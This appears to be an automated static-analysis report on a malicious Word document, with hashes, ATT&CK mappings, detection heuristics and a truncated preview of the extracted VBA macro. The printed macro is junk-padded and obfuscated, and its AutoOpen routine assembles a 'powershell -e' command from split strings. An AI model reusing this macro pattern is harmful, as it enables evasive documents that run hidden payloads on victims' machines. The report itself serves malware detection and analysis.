Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 05c3b84310d870eb…

MALICIOUS

Office (OLE)

212.6 KB Created: 2019-03-13 16:35:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: f9f92219a025af8f8abce262565915a1 SHA-1: 1124f30d389e89438fbc84836604e82be558cac0 SHA-256: 05c3b84310d870eb0acd511c1ec7b338718cafd6c953fcba40a15e9a2a7e7126
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, a common technique for initial execution. The macro exhibits obfuscation by reassembling API names, specifically targeting 'Win32_Process', indicating an intent to manipulate running processes. This suggests the macro is designed to download and execute a secondary payload or perform other malicious actions on the system.

Heuristics 8

  • ClamAV: Doc.Malware.00536d-6896571-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6896571-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44224 bytes
SHA-256: 742b6e03121354f3c7f27c33480d0f0ecaeca01b9e2ab9eb6c74669d94142327
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kUoAAk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function p_ckZU()
   If JAc1QAAZ = FAAAAcA Then
QGGAAUoG = CVar(ODQB_A)
mUxAAAAZ = cAAAAA + CInt(awABAB) * 954745033 * CBool(293935947) + 67444174 / Round(iUXGXA) - AA4XkcQk + Sqr(336960233) - 159680878 * CByte(854232594)
TDAA_A = CInt(SAcAXAA)
End If
   If kkXAoA = CZQAU1 Then
hAGAwo = CVar(CABADckA)
bXkUAUGA = To4UGD + CInt(uDoBoAk) * 984862781 * CBool(597508345) + 93656683 / Round(TCQxAB) - TcDC4A + Sqr(464884883) - 190419638 * CByte(299199633)
zDBA1AU = CInt(O1kB_XCA)
End If
   If u11UDDX = wBAcBAwG Then
I1BwX4 = CVar(lAoBAZA)
N4AAAAA = d4QDAB + CInt(XkADDAB) * 583385967 * CBool(468548898) + 644221666 / Round(J1ABAc) - GxoABD + Sqr(37187515) - 902511684 * CByte(954023836)
BD1AkGU = CInt(mAGQUwAA)
End If
   If QAAQZGCB = Ixk1A_A Then
vXAAAoA = CVar(GQC4GZGU)
k1A_ADAC = wGAAk4ZZ + CInt(uACkAA) * 591017016 * CBool(575907964) + 340797432 / Round(J_DGDDU) - QC1cBA + Sqr(894872931) - 227731345 * CByte(467837766)
JBQA_D = CInt(cZA4DkQw)
End If
   If kcDAx_AG = BQACAG Then
MB_wAUA = CVar(NBDADkBx)
L1GD4ZG4 = nAAoUAD + CInt(bGA_4BA) * 728163813 * CBool(775302397) + 685291590 / Round(z1CDXB_) - pAAkD_xZ + Sqr(711037668) - 90067245 * CByte(756918919)
bACAAAQ = CInt(w1AAZBZQ)
End If
   If PDQXxA4A = EBwGQD Then
o_A1xB = CVar(FxkA4GA)
WAAAAD = HAAAUQ + CInt(PADAcDXA) * 459725481 * CBool(620825754) + 579154339 / Round(iUDAZDCD) - GAcoAxA + Sqr(725534470) - 499783628 * CByte(740757005)
wDAADw = CInt(cQZUZCXc)
End If
   If BD_BGAUA = JwwA4k Then
bUcAQA = CVar(jAQ4kCA)
OAQA1ko = jAAZBA + CInt(ckow1wCA) * 169757531 * CBool(671654469) + 517635194 / Round(MAUBAC) - MAkAABBA + Sqr(142962908) - 158201113 * CByte(617999129)
UACAcC = CInt(FADAxA)
End If
   If vAUDAxc = awUA4w Then
mA1_xAA = CVar(uAAAQo)
zAxACXw = oBAAAw + CInt(sXAAAACA) * 109147979 * CBool(136268228) + 656116421 / Round(wA1w4_Q) - jACAcXoQ + Sqr(557104055) - 97416911 * CByte(715694879)
kDAD4AUA = CInt(qAAwcAU)
End If
   If NAA4Ao = K4CAco Then
DUDQAAoX = CVar(AwG_xcXD)
bU1CAD = pXkAAwAD + CInt(BXUcADo) * 959511917 * CBool(344248143) + 725141079 / Round(cAAA_GkA) - MDDDQUD_ + Sqr(161730974) - 629699950 * CByte(227342520)
BBQACA = CInt(EAAA_G)
End If
End Function
Sub autoopen()
On Error Resume Next
   If IAUAAAAw = QX4XAUBk Then
w1UCBUDA = CVar(dAUAZcC1)
RAAAAAB1 = bCU4Bo + CInt(LwADQAA) * 408083243 * CBool(816576219) + 561798642 / Round(m1DAUA) - MxkA1w + Sqr(217021948) - 616937183 * CByte(217920427)
jwQAAA = CInt(zBAxxB)
End If
   If EUX_xD = qkAABDU Then
kwAoDkQ = CVar(MoDACC)
iDx_AAkX = zAxQCG + CInt(NwAcBUQc) * 127776180 * CBool(804479961) + 71129634 / Round(oXGUAD) - ZAUDABGA + Sqr(686635103) - 953110096 * CByte(707851326)
kAUGZA = CInt(jAkcAADA)
End If
icB_CD (sAwGAQ + "po" + FAQQBU + "wersh" + SDAwA1 + "ell -e " + MDAxDA + nABQcGDB + wGx_ACQc + H_AACC + hDwDBB + hZ_AAAA)
   If lGQUAXA = UQABxwUc Then
YABAQDBQ = CVar(uZAQQAAo)
BAB4DAxA = FC1BA_A + CInt(QZACZCAB) * 648517543 * CBool(797211685) + 205682291 / Round(FBAUBC_) - U4UoCXD + Sqr(142400471) - 299086504 * CByte(667745634)
dA4DDG_1 = CInt(z_BBAAw)
End If
   If uDxxAA4 = PABDAADC Then
nAA1BDA = CVar(RAcDxxBQ)
rACAQAc = RUBDAB + CInt(NA_CUoU) * 965549475 * CBool(64820234) + 337454182 / Round(D_QBU1o) - roBQBAXZ + Sqr(469887770) - 642964789 * CByte(503075407)
QUA4AAAX = CInt(cAcoA1)
End If
   If nADokQA_ = EUAA11 Then
GUAccAU = CVar(SUADUUA_)
NAZB1A = Jo_UAU + CInt(XcQDC_kQ) * 569735646 * CBool(770443261) + 839798132 / Round(kUGADDx) - aQAkwkQ + Sqr(959247602) - 645380309 * CByte(25472316)
OQUXwQXc = CInt(iACZZQA)
End If
End Sub
Function Io_wABAc()
   If SZ1oowA = FAc4AU Then
sXDAAAB_ = CVar(SABcAw1)
bUAQABUx = qxA1wDA + CInt(vA_UAAG1) * 314410190 * CBool(118807693) + 678997129 / Round(KAc1DU) - CwBBAAAo + Sqr(638058947) - 613257942 * CByte(741916099)
pUDcACZ = CIn
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.